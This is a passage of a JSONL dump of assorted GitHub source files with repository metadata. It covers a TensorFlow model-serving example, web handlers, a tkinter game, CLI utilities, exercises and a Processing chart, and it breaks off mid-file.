sess.run(tf.global_variables_initializer())\n\n # Fit all training data\n for epoch in range(training_epochs):\n for (x, y) in zip(train_X, train_Y):\n sess.run(optimizer, feed_dict={X: x, Y: y})\n\n train_mse = sess.run(mse, feed_dict={X: train_X, Y: train_Y})\n print('train mse', train_mse)\n # Testing example\n test_X = rng.uniform(-10, 10, (n_samples,))\n test_Y = test_X * weight + bias\n test_mse = sess.run(mse, feed_dict={X: test_X, Y: test_Y})\n print('test mse', test_mse)\n return sess, pred, {X: test_X}\n\n\ndef main():\n # obtain session, output tensor and feed_dict\n session, tensor, feed_dict = train_regression()\n\n # in provided session, create model 'tf_model' from output tensor and sample data\n with session.as_default():\n model = ebonite.create_model(tensor, feed_dict, 'tf_model')\n\n # run flask service with this model\n run_model_server(model)\n # now you can use client.py to call this service or go to http://localhost:9000/apidocs to view swagger ui\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zyfra/ebonite","sub_path":"examples/tensorflow_model/train_and_serve.py","file_name":"train_and_serve.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"69"}
+{"seq_id":"30915951263","text":"from sanic.response import json, text\nfrom mongoengine.errors import NotUniqueError\nimport datetime\nimport json as pyjson\nfrom bson import json_util\nfrom copy import deepcopy\n\n# src module\nfrom handler import APIHandler\nfrom model import User, Task\nfrom web import error, generateSessionToken, log, AccountLock, validate, Authenticated, AuthenticatedError\n\nclass index(APIHandler):\n\n def get(self, requests):\n '''任务查询'''\n where = self.query_constraint(requests)\n # 返回的不是数组,就表示出现错误了\n if isinstance(where, tuple):\n return error(where[0], {'msg': where[1]})\n\n users = list()\n for user in User.get_users(where):\n users.append(user)\n\n data = {\n 'body': {'results': users}\n }\n return json(**data)\n\n def post(self, requests):\n '''新建任务'''\n data = requests.json\n # 检测用户是否登录\n session = requests.headers.get('X-LC-Session')\n where = self.query_constraint(requests)\n user = next(User.get_users(where, sessionToken=session, raw=True)).first()\n\n if user is None:\n return error(211)\n\n if not isinstance(data, dict) or data is None:\n return error(107)\n\n if 'title' not in data:\n return error(301)\n # if User.objects(username=request['username']).first() is not None:\n # return error(202)\n\n # 生成 sessionToken\n # sessionToken = generateSessionToken()\n data.update({\n # 'title': data.get('title').decode('utf-8'),\n # 'desc': data.get('desc').decode('utf-8'),\n 'own': user.id,\n 'createdAt': datetime.datetime.utcnow(),\n 'updatedAt': datetime.datetime.utcnow(),\n })\n print(data)\n task = Task(**data)\n task.save()\n\n body = deepcopy(data)\n body.update({\n # 'title': body['title'].encode('utf-8'),\n 'own': str(body['own']),\n 'createdAt': data['createdAt'].isoformat(),\n 'updatedAt': data['updatedAt'].isoformat()\n })\n\n # print(body)\n result = {\n 'body': body,\n 'headers': {'Location': '/tasks/{}'.format(task.id)},\n 'status': 201\n }\n # print(result)\n # return text(str(result))\n return json(**result)\n # task = Task(**)\n","repo_name":"xiaojieluo/webnav","sub_path":"src/handler/TaskHandler.py","file_name":"TaskHandler.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74968301339","text":"from model.state import *\nfrom model.memory import *\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog, colorchooser\nfrom boardview import BoardView\nfrom controller import Controller\nimport json\n\n#create new game\ndef newcmd():\n rows = simpledialog.askinteger('Input', 'How many rows?', minvalue=3, parent=root)\n cols = simpledialog.askinteger('Input', 'How many columns?', minvalue=14, parent=root)\n sz = 3 if rows % 2 else 2\n bdv.discard_tiles()\n load_history(History(rows, cols, sz))\n#save current game\ndef saveascmd():\n save_file = filedialog.asksaveasfilename()\n with open(save_file, 'w') as sf:\n json.dump(controller.cache.hist.__dict__, sf)\n#open saved game\ndef opencmd():\n open_file = filedialog.askopenfilename()\n with open(open_file) as of:\n histdict = json.load(of)\n bdv.discard_tiles()\n load_history(History(**histdict))\n\ndef load_history(history):\n cache = Cache(history)\n board = cache.latest\n root.geometry(str(max(board.cols*40,800))+'x'+str(board.rows*40)+'+400+200')\n bdv.setup(controller, board.rows, board.cols)\n cache.link_gui(controller, bdv)\n#set colors of display\ndef set_color(player, base=False):\n rgb, color = colorchooser.askcolor()\n if base:\n bdv.basecolors[player] = color\n else:\n bdv.colors[player] = color\n bdv.set_view(controller.cache.latest)\n\n\nroot = tk.Tk()\nroot.title(\"Conquid\")\nroot.option_add('*tearOff', False)\nmenubar = tk.Menu(root)\nroot['menu'] = menubar\n# file menu creation\nfilemenu = tk.Menu(menubar)\nmenubar.add_cascade(menu=filemenu, label=\"File\")\nfilemenu.add_command(label='New', command=newcmd)\nfilemenu.add_command(label='Open', command=opencmd)\nfilemenu.add_command(label='Save As', command=saveascmd)\n# color menu creation\ncolormenu = tk.Menu(menubar)\nmenubar.add_cascade(menu=colormenu, label=\"Colors\")\ncolormenu.add_command(label='Player 1 Base', command=lambda:set_color(1,base=True))\ncolormenu.add_command(label='Player 1 Cell', command=lambda:set_color(1))\ncolormenu.add_command(label='Player 2 Base', command=lambda:set_color(2,base=True))\ncolormenu.add_command(label='Player 2 Cell', command=lambda:set_color(2))\n\n# controller and boardview setup\nbutton_frame = tk.Frame(root)\nturn_box = tk.Label(button_frame,text='PLAYER 1 TURN', width=15)\nbdv = BoardView(root, turn_box)\ncontroller = Controller()\ncontroller.boardview = bdv\n\n#move buttons\nmove_btns = {}\nmove_btns['A'] = tk.Button(button_frame, relief='groove', text='acquire', width=8, command=lambda:controller.button_pressed('A'))\nroot.bind('', lambda e: move_btns['A'].invoke())\nmove_btns['C'] = tk.Button(button_frame, relief='groove', text='conquer', width=8, command=lambda:controller.button_pressed('C'))\nroot.bind('', lambda e: move_btns['C'].invoke())\nmove_btns['V'] = tk.Button(button_frame, relief='groove', text='vanquish', width=8, command=lambda:controller.button_pressed('V'))\nroot.bind('', lambda e: move_btns['V'].invoke())\nmove_btns['Q'] = tk.Button(button_frame, relief='groove', text='conquest', width=8, command=lambda:controller.button_pressed('Q'))\nroot.bind('', lambda e: move_btns['Q'].invoke())\n#undo and confirm\nundo_btn = tk.Button(button_frame, relief='groove', text='undo', width=8, command=controller.undo)\nroot.bind('', lambda e: undo_btn.invoke())\nconfirm_btn = tk.Button(button_frame,relief='groove', text='confirm', width=8, command=controller.confirm)\nroot.bind('', lambda e: confirm_btn.invoke())\n#playback\nprev_btn = tk.Button(button_frame,relief='groove', text='<<', width=10, command=controller.prev_board)\nroot.bind('', lambda e: prev_btn.invoke())\npause_play = tk.Button(button_frame,relief='groove', text='#', width=10, command=controller.pauseplay)\nroot.bind('', lambda e: pause_play.invoke())\nnext_btn = tk.Button(button_frame,relief='groove', text='>>', width=10, command=controller.next_board)\nroot.bind('', lambda e: next_btn.invoke())\n#link to controller\ncontroller.link_buttons(move_btns, undo_btn, confirm_btn, prev_btn, pause_play, next_btn)\n\n#pack\nbutton_frame.pack(side='bottom')\nmove_btns['A'].grid(row=0, column=0)\nmove_btns['C'].grid(row=0, column=1)\nmove_btns['V'].grid(row=0, column=2)\nmove_btns['Q'].grid(row=0, column=3)\nturn_box.grid(row=0, column=4)\nundo_btn.grid(row=0, column=5)\nconfirm_btn.grid(row=0, column=6)\nprev_btn.grid(row=0, column=7)\npause_play.grid(row=0,column=8)\nnext_btn.grid(row=0, column=9)\n#rev it up\nload_history(History(14, 28, 2))\nroot.focus()\nroot.mainloop()\n","repo_name":"TortCode/ConquidPy","sub_path":"Conquid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12741617122","text":"import numpy as np\nimport cgt\nfrom cgt import nn, core\n\ndef test_flatvec():\n cgt.reset_config\n cgt.set_precision('double')\n cgt.core.update_config(backend=\"python\") # XXX\n\n N = 10\n K = 3\n\n Xval = np.random.randn(N,K)\n wval = np.random.randn(K)\n bval = np.random.randn()\n yval = np.random.randn(N)\n\n X_nk = cgt.shared(Xval, \"X\")\n y_n = cgt.shared(yval, \"y\")\n w_k = cgt.shared(wval, \"w\")\n b = cgt.shared(bval, name=\"b\")\n\n ypred = cgt.dot(X_nk, w_k) + b\n\n err = cgt.sum(cgt.square(ypred - y_n))\n g = cgt.grad(err, [w_k, b])\n g = core.simplify(g)\n\n pars = [w_k, b]\n flatx = nn.setup_contiguous_storage(pars)\n f = cgt.function([], [err,cgt.flatcat(g)])\n","repo_name":"joschu/cgt","sub_path":"cgt/tests/_test_flatvec.py","file_name":"_test_flatvec.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"69"}
+{"seq_id":"16233691850","text":"banco = {'04954199158':\n {'CPF':'04954199158',\n 'Nome':'Daniel Sottovia Gomide',\n 'Idade':22,\n 'Curso':'Engenharia Mecânica'}}\n\ndef checagem(CPF,banco):\n cont = 0\n for individuos in banco:\n if CPF == individuos:\n cont += 1\n if cont == 0:\n return True\n else:\n return False\n\ndef cadastro(banco):\n CPF = str(input('CPF: '))\n while CPF != '-1':\n if checagem(CPF, banco):\n nome = str(input('Nome: '))\n idade = int(input('Idade: '))\n while idade <= 0:\n idade = int(input('Idade: '))\n curso = str(input('Curso: '))\n banco[CPF] = {'CPF': CPF, 'Nome': nome,\n 'Idade': idade, 'Curso':curso}\n elif checagem(CPF, banco):\n print('CPF já existente!!!')\n print('Informe outro CPF ou -1 para parar o cadastro.')\n CPF = str(input('CPF: '))\n print('Para continuar o cadastramento insira um novo CPF ou digite -1.')\n CPF = str(input('CPF: '))\n return banco\n\ndef consulta(banco):\n dados = str(input('CPF à consultar: '))\n for cpf in banco:\n if cpf == dados:\n return print(banco[cpf])\n\ndef deletar(banco):\n dados = str(input('CPF à remover: '))\n cont = 0\n for cpf in banco:\n if cpf == dados:\n cont += 1\n del banco[cpf]\n print('Cadastro excluído!')\n print(banco)\n return banco\n if cont == 0:\n print('CPF não encontrado.')\n return banco\n\ndef interface(banco):\n while True:\n pergunta = str(input('Adicionar: 1 \\nRemover: 2 \\nConsultar: 3 \\nDigite a sua escolha: '))\n if pergunta == '1':\n banco = cadastro(banco)\n elif pergunta == '2':\n banco = deletar(banco)\n elif pergunta == '3':\n consulta(banco)\n else:\n print('Obrigado pela atenção!!!')\n break\n\ninterface(banco)\n\n\n\n\n\ninterface(banco)\n\n\n\n","repo_name":"Daniel-Sottovia/INE5603","sub_path":"Exercícios/cadastro.py","file_name":"cadastro.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32770297324","text":"import json\n\ntasks = {}\n\ndef load_tasks():\n try:\n with open('tasks.json', 'r') as f:\n return json.load(f)\n except (FileNotFoundError, json.JSONDecodeError):\n return {}\n\ndef save_tasks():\n with open('tasks.json', 'w') as f:\n json.dump(tasks, f)\n\ndef edit_task():\n task_name = input(\"Enter the name of the task to edit: \")\n if task_name in tasks:\n new_task_name = input(\"Enter the new name of the task: \")\n tasks[new_task_name] = tasks.pop(task_name)\n print(f\"Task '{task_name}' has been renamed to '{new_task_name}'.\")\n status = input(f\"Mark task '{new_task_name}' as completed? (y/n): \")\n if status.lower() == 'y':\n tasks[new_task_name] = True\n print(f\"Task '{new_task_name}' has been marked as completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n\ntasks = load_tasks()\n\nwhile True:\n action = input(\"Would you like to add, edit, remove, complete, or uncomplete a task? Type 'list', 'save', or 'quit' to exit: \")\n \n if action == \"add\":\n task_name = input(\"Enter the name of the task: \")\n tasks[task_name] = False\n print(f\"Task '{task_name}' has been added to the to-do list.\")\n elif action == \"edit\":\n edit_task()\n elif action == \"remove\":\n task_name = input(\"Enter the name of the task to remove: \")\n if task_name in tasks:\n del tasks[task_name]\n print(f\"Task '{task_name}' has been removed from the to-do list.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"complete\":\n task_name = input(\"Enter the name of the task to complete: \")\n if task_name in tasks:\n tasks[task_name] = True\n print(f\"Task '{task_name}' has been marked as completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"uncomplete\":\n task_name = input(\"Enter the name of the task to uncomplete: \")\n if task_name in tasks:\n tasks[task_name] = False\n print(f\"Task '{task_name}' has been marked as not completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"list\":\n print(\"Current to-do list:\")\n for task_name, completed in tasks.items():\n status = \"completed\" if completed else \"not completed\"\n print(f\"- {task_name} ({status})\")\n elif action == \"save\":\n save_tasks()\n print(\"To-do list saved to file.\")\n elif action == \"quit\":\n save_tasks()\n break\n else:\n print(\"Invalid action. Please type 'add', 'edit', 'remove', 'complete', 'uncomplete', 'list', 'save', or 'quit'.\")\n","repo_name":"Neurorazor/30-Days-of-Python","sub_path":"ToDo /task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31039890325","text":"# -*- encoding: utf-8 -*-\nfrom django.test import TestCase\nimport requests\n\ndef api_connector():\n headers = {'Content-Type': 'application/json',\n 'credential': 'ZGpzOTAzaWZuc2Zpb25kZnNubm5u',}\n servername = \"api.moni.com.ar\"\n\n return servername, headers\n\ndef get_prestamo(dni):\n servername, headers = api_connector()\n URL = \"https://\" + servername + \"/api/v4/scoring/pre-score/\" + str(dni)\n \n response = requests.request(\"GET\",URL, headers=headers)\n if response.status_code == 200:\n response_json = response.json()\n has_error = response_json.get(\"has_error\")\n status = response_json.get(\"status\")\n\n return status, has_error","repo_name":"nbalmaceda/Prueba-tec","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22155116171","text":"num = int(input(\"Digite um número inteiro: \"))\n\nprimo = True\ndiv = 2\n\nwhile div < num:\n if num % div == 0:\n primo = False\n break\n div += 1\n\nif primo and num > 1:\n print('primo')\nelse:\n print('não primo')\n\n","repo_name":"andreztz/exercicios","sub_path":"ListaDeExercicios-3/exercicio-5.py","file_name":"exercicio-5.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13897042057","text":"#-----------------------------------------------------\n# Mimas: conference submission and review system\n# (c) Allan Kelly 2016-2020 http://www.allankelly.net\n# Licensed under MIT License, see LICENSE file\n# -----------------------------------------------------\n\n# System imports\n\n# Google imports\nimport logging\n\nfrom google.appengine.ext import ndb\n\n# Local imports\nimport roundreviews\nimport basehandler\nfrom submission_lib import submissionrecord\n\n\nclass ClassicReviewDecisionPage(basehandler.BaseHandler):\n\n def make_page(self, crrt_conf):\n review_round = int(self.request.get(\"round\"))\n tracks = crrt_conf.mapped_track_obects()\n crrt_track = self.request.get(\"track\", default_value=tracks.keys()[0])\n\n submissions = self.sorted_submissions(crrt_conf, crrt_track, review_round)\n\n template_values = {\n 'crrt_conf': crrt_conf,\n \"track_objects\": tracks,\n \"crrt_track\": crrt_track,\n \"submissions\": submissions,\n \"submissions_len\": len(submissions),\n \"decisions\": submissionrecord.get_decision_summary(crrt_conf.key, crrt_track, review_round),\n \"decision_maker\": crrt_conf.user_rights().has_decision_right_for_round(\n self.get_crrt_user().email(), review_round),\n \"review_round\": review_round,\n \"track_slots\": crrt_conf.mapped_track_obects()[crrt_track].slots,\n }\n\n self.write_page('subreview_lib/classicreviewdecisionpage.html', template_values)\n\n def sorted_submissions(self, crrt_conf, crrt_track, review_round):\n submissions = submissionrecord.retrieve_conference_submissions_by_track_and_round(\n crrt_conf.key, crrt_track, review_round)\n\n if self.request.params.has_key(\"mean\"):\n sorted = submissionrecord.sort_submissions_by_mean_high_to_low(submissions, review_round)\n else:\n sorted = submissionrecord.sort_submissions_by_total_high_to_low(submissions, review_round)\n return sorted\n\n def get(self):\n if not (self.session.has_key(\"crrt_conference\")):\n logging.debug(\"Conference key session variable missing\")\n return\n\n crrt_conf = ndb.Key(urlsafe=self.session[\"crrt_conference\"]).get()\n\n self.make_page(crrt_conf)\n\n def submit_decisions(self, review_round):\n if not (self.session.has_key(\"crrt_conference\")):\n logging.debug(\"Conference key session variable missing\")\n return\n\n roundreviews.submit_decisions(\n ndb.Key(urlsafe=self.session[\"crrt_conference\"]),\n self.request.get(\"tracklist\"),\n review_round,\n self.request)\n\n def decline_no_decisions(self, review_round):\n self.submit_decisions(review_round)\n roundreviews.mass_track_change(\n ndb.Key(urlsafe=self.session[\"crrt_conference\"]),\n self.request.get(\"tracklist\"),\n review_round,\n \"No decision\",\n \"Decline\")\n\n def post(self):\n review_round = int(self.request.get(\"review_round\"))\n if self.request.get(\"SubmitDecision\"):\n self.submit_decisions(review_round)\n if self.request.get(\"DeclineNoDecisions\"):\n self.decline_no_decisions(review_round)\n\n self.redirect(\"/classic_review_decisions?track=\" +\n self.request.get(\"tracklist\") +\n \"&round=\" + str(review_round))\n","repo_name":"allankellynet/mimas","sub_path":"subreview_lib/classicreviewdecisionpage.py","file_name":"classicreviewdecisionpage.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28658371325","text":"def operate(a, op, b):\n if op == 0:\n return a+b\n elif op == 1:\n return a-b\n elif op == 2:\n return a*b\n else:\n if a >= 0:\n return a//b\n else:\n return (-a)//b * -1\n\n\ndef dfs(n, s):\n global minA, maxA\n if n == N:\n minA = min(minA, s)\n maxA = max(maxA, s)\n return\n for i in range(4):\n if op[i]:\n op[i] -= 1\n dfs(n+1, operate(s, i, A[n]))\n op[i] += 1\n\n\nN = int(input())\nA = [*map(int, input().split())]\nop = [*map(int, input().split())]\nminA, maxA = 1e9, -1e9\ndfs(1, A[0])\nprint(maxA, minA, sep='\\n')\n\n# 연산을 eval 함수를 이용하면 C++14 기준으로 되나봄.. 통과됨..","repo_name":"hjle2/Algorithm","sub_path":"baekjoon/백트래킹/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13917647459","text":"#-*- coding: utf-8 -*-\n\n# /usr/include/linux/fadvise.h\nPOSIX_FADV_SEQUENTIAL = 2\nPOSIX_FADV_DONTNEED = 4\n\nlibc = offset = length = None\n\ndef fadvise(fd, seq=False, drop_cache=False):\n\t'Avoid filling disk cache with discardable data.'\n\tglobal libc, offset, length\n\tif not libc: # only import and initialize ctypes if used\n\t\timport ctypes, ctypes.util\n\t\tlibc = ctypes.CDLL(ctypes.util.find_library('c'))\n\t\toffset = length = ctypes.c_uint64(0)\n\tif not isinstance(fd, (int, long)): fd = fd.fileno()\n\n\t# These don't work (EINVAL) when or'ed\n\tif seq: libc.posix_fadvise(fd, offset, length, POSIX_FADV_SEQUENTIAL)\n\tif drop_cache: libc.posix_fadvise(fd, offset, length, POSIX_FADV_DONTNEED)\n","repo_name":"mk-fg/fs-bitrot-scrubber","sub_path":"fs_bitrot_scrubber/fadvise.py","file_name":"fadvise.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"69"}
+{"seq_id":"4067682597","text":"from lona.protocol import OPERATION, PATCH_TYPE\n\n\nclass AttributeDict:\n PATCH_TYPE = PATCH_TYPE.ATTRIBUTES\n\n def __init__(self, node, *args, **kwargs):\n self._node = node\n self._attributes = dict(*args, **kwargs)\n\n # dict helper #############################################################\n def keys(self):\n with self._node.lock:\n return self._attributes.keys()\n\n def items(self):\n with self._node.lock:\n return self._attributes.items()\n\n def pop(self, name):\n with self._node.lock:\n attribute = self._attributes.pop(name)\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.REMOVE,\n payload=[\n name,\n ],\n )\n\n return attribute\n\n def clear(self):\n with self._node.lock:\n if not self._attributes:\n return\n\n self._attributes.clear()\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.CLEAR,\n payload=[],\n )\n\n def get(self, *args, **kwargs):\n with self._node.lock:\n return self._attributes.get(*args, **kwargs)\n\n def update(self, value):\n if not isinstance(value, dict):\n raise ValueError('dict required')\n\n with self._node.lock:\n for key, value in value.items():\n self[key] = value\n\n def __getitem__(self, name):\n with self._node.lock:\n return self._attributes[name]\n\n def __setitem__(self, name, value, issuer=None):\n if not isinstance(value, (int, bool, float, str)):\n raise ValueError('unsupported type: {}'.format(type(value)))\n\n if name in ('id', 'class', 'style'):\n raise RuntimeError(\n \"Node.attributes['{}'] is not supported. \"\n 'Use Node.{}{} instead.'.format(\n name, name, '_list' if name != 'style' else '')\n )\n\n with self._node.lock:\n if name in self._attributes and self._attributes[name] == value:\n return\n\n self._attributes[name] = value\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.SET,\n payload=[\n name,\n value,\n ],\n issuer=issuer,\n )\n\n def __delitem__(self, name):\n with self._node.lock:\n del self._attributes[name]\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.REMOVE,\n payload=[\n name,\n ],\n )\n\n def __eq__(self, other):\n with self._node.lock:\n if isinstance(other, self.__class__):\n other = other._attributes\n\n return self._attributes == other\n\n def __iter__(self):\n with self._node.lock:\n return self._attributes.__iter__()\n\n def __bool__(self):\n with self._node.lock:\n return bool(self._attributes)\n\n # serialisation ###########################################################\n def _reset(self, value):\n if not isinstance(value, dict):\n raise ValueError('unsupported type')\n\n for k, v in value.items():\n if not isinstance(v, (int, bool, float, str)):\n raise ValueError('unsupported type')\n\n if k in ('id', 'class', 'style'):\n raise RuntimeError(\n \"Node.attributes['{}'] is not supported. \"\n 'Use Node.{}{} instead.'.format(\n k, k, 'list' if k != 'style' else '')\n )\n\n with self._node.lock:\n self._attributes = value\n\n self._node.document.add_patch(\n node_id=self._node.id,\n patch_type=self.PATCH_TYPE,\n operation=OPERATION.RESET,\n payload=[\n dict(value),\n ],\n )\n\n def _serialize(self):\n return dict(self._attributes)\n\n # string representation ###################################################\n def to_attribute_string(self, skip_value=False):\n with self._node.lock:\n string = []\n\n for key, value in self._attributes.items():\n if skip_value and key == 'value':\n continue\n\n string.append('{}=\"{}\"'.format(key, value))\n\n return ' '.join(string)\n\n def to_sub_attribute_string(self):\n with self._node.lock:\n string = []\n\n for key, value in self._attributes.items():\n string.append('{}: {}'.format(key, value))\n\n return '; '.join(string)\n\n def __repr__(self):\n return ''.format(repr(self._attributes))\n\n\nclass StyleDict(AttributeDict):\n PATCH_TYPE = PATCH_TYPE.STYLE\n\n def __repr__(self):\n return ''.format(repr(self._attributes))\n","repo_name":"simrit1/lona","sub_path":"lona/html/attribute_dict.py","file_name":"attribute_dict.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"21763729292","text":"# %%\n##\nimport calendar as cal\nfrom datetime import date as dt\nimport re\nimport string as st\nfrom collections import Counter\nimport math\nimport random\nimport pickle\nimport json\n\n# %%\n##\ns = cal.calendar(2020)\n\nprint(s)\n\n# %%\n##\ns = cal.month(2020, 6)\n\nprint(s)\n\n# %%\n##\nd_1 = dt(2020, 6, 1)\nd_2 = dt(2020, 7, 18)\n\nprint(d_2 - d_1)\n\n# %%\n##\nstring = 'Python 3.8'\n\np = re.compile(pattern=r\"\\d\").findall(string)\n\nprint(p)\n\n# different solution\n\nresult = re.findall(pattern=r\"\\d\", string=string)\nprint(result)\n\n# %%\n##\nstring = '!@#$%^&45wc'\n\nres = re.findall(r\"\\w\", string=string)\n\nprint(res)\n\n# %%\n##\nraw_text = \"Wyślij email na adres: info@template.com lub sales-info@template.it\"\n\nres = re.findall(r\"[\\w.-]+@[\\w.-]+\", raw_text)\n\nprint(res)\n\n# %%\n##\ntext = 'Programowanie w języku Python - od A do Z'\n\nres = re.split(r\"\\s+\", text)\n\nprint(res)\n\n# %%\n##\nres = st.ascii_letters\n\nprint(res)\n\n# %%\n##\nitems = ['YES', 'NO', 'NO', 'YES', 'EMPTY', 'YES', 'NO']\n\nres = Counter(items)\n\nprint(res)\n\n# or\ncounter = Counter()\nitems = ['YES', 'NO', 'NO', 'YES', 'EMPTY', 'YES', 'NO']\nfor item in items:\n counter[item] += 1\nprint(counter)\n\n\n# %%\n##\n\n\ndef sigmoid(x):\n func = 1 / (1 + math.exp(-x))\n return func\n\n\n# %%\n##\n\n\nrandom.seed(12)\n\nitems = ['python', 'java', 'sql', 'c++', 'c']\n\nprint(random.choice(items))\n\n# %%\n##\n\n\nrandom.seed(15)\n\nitems = ['python', 'java', 'sql', 'c++', 'c']\nrandom.shuffle(items)\n\nprint(items)\n\n# %%\n##\nids = ['001', '003', '011']\n\npickle.dump(ids, open('part_25/data.pickle', 'wb'))\n\n# %%\n##\nstocks = {'PLW': 360.0, 'TEN': 320.0, 'CDR': 329.0}\n\nprint(json.dumps(stocks, sort_keys=True, indent=4))\n","repo_name":"LukasKodym/python_exercises","sub_path":"part_25/builtin_packs.py","file_name":"builtin_packs.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2055979603","text":"import csv\n\ndef setup():\n global years, scores, margin, graphHeight, positions, title\n size(1000, 200)\n background(20)\n fill(255)\n title = \"Average math scores for 3rd graders by year.\"\n years = []\n scores = []\n margin = 40\n positions = []\n graphHeight = (height - margin) - margin\n positions = processData(filename=\"math_scores.csv\")\n drawData(positions, vertices=True,edges=False,grooves=True)\n drawCurves(vList=positions)\n \ndef processData(filename):\n global overallMin, overallMax, xSpacer\n f = open(filename, \"r\")\n with f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i > 0:\n years.append(int(row[1]))\n scores.append(int(row[2]))\n overallMin = min(scores) # What does Cairo say?\n overallMax = max(scores)\n xSpacer = (width - margin - margin) / (len(years) - 1)\n for i in range(0, len(scores)):\n adjScore = map(scores[i], overallMin, overallMax, 0, graphHeight)\n yPos = height - margin - adjScore\n xPos = margin + (xSpacer * i)\n positions.append(PVector(xPos, yPos))\n return positions\n\ndef drawData(positions, vertices=False,edges=False,grooves=False):\n for i in range(0, len(positions)):\n textSize(12)\n textAlign(CENTER,CENTER)\n text(years[i], positions[i].x, height - margin + 20)\n if grooves:\n # draw grooves\n stroke(200, 100)\n strokeWeight(1)\n line(positions[i].x, margin, positions[i].x, height - margin)\n if vertices:\n # Draw the vertices\n stroke(200, 100)\n circle(positions[i].x, positions[i].y, 7)\n if edges:\n # Draw the edges\n if(i > 0):\n # stroke(200)\n strokeWeight(2)\n line(positions[i].x, positions[i].y,\n positions[i - 1].x, positions[i - 1].y)\n textSize(14)\n textAlign(LEFT,CENTER)\n text(overallMax, 5, margin)\n text(overallMin, 5, height - margin)\n textAlign(RIGHT,BOTTOM)\n text(title, width-margin,margin/2)\n \ndef drawCurves(vList):\n # Draw curved lines\n stroke(23, 225, 0)\n strokeWeight(3)\n noFill()\n beginShape()\n # start point\n curveVertex(vList[0].x,vList[0].y)\n for i in range(0,len(vList)):\n curveVertex(vList[i].x,vList[i].y)\n # end point\n curveVertex(vList[-1].x,vList[-1].y)\n endShape()\n","repo_name":"untr-aditi-onal/Python-Vis","sub_path":"mathscores/mathscores.pyde","file_name":"mathscores.pyde","file_ext":"pyde","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9418011898","text":"# Tarea 12.\n# Extender el programa happiness.py para que incluya lo siguiente:\n# 1. La descarga de datos del índice de felicidad debe\n# enviarse a un archivo csv.\n# 2. El programa debe contener una función para seleccionar los\n# valores de felicidad en fechas determinadas.\n# Las fechas deben poderse especificar en una forma similar a los \"Index slices\".\n# German Jordi Arreortua Reyes\n# 07/06/2022\n# ! ./venv/bin/python3.8\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload world happiness time series from hedonometer project.\nSee https://hedonometer.org/timeseries/en_all/?from=2020-08-24&to=2022-02-23\nCreated on Tue Feb 24 15:35:23 2022\n\n@author: Feliú Sagols\nCDMX\n\"\"\"\n\nimport csv\nimport datetime\n# import pandas as pd\nimport requests\n# import psycopg2\n\nimport loggers\n\nTIMESERIES_DATABASE = \"ts_db\"\n\nglobal LOGGER\n\n\n# def last_available_date():\n# \"\"\"\n# Returns the newest record base_date in happiness table\n# \"\"\"\n# conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n# TIMESERIES_DATABASE)\n# cur = conn.cursor()\n# cur.execute(\"\"\"\n# select date_\n# from happiness\n# order by date_ desc\n# limit 1;\n# \"\"\")\n# date_ = cur.fetchone()[0]\n# conn.close()\n# return date_\n\n\n# def get_happiness_ts(last_date, last_days):\n# \"\"\"\n# Returns the happiness time series.\n#\n# Parameters\n# ----------\n# last_date : datetime.pyi\n# Last base_date in the time period to download.\n# last_days:\n# Number of days previous to the last base_date to download.\n#\n# Examples\n# --------\n# >>> get_happiness_ts(datetime.datetime(2022, 2, 26), 700)\n#\n# Returns\n# -------\n# A dataframe with the time series.\n# \"\"\"\n# conn = psycopg2.connect(\"dbname=%s user=fsagols host=localhost\" %\n# TIMESERIES_DATABASE)\n# cur = conn.cursor()\n# cur.execute(\n# 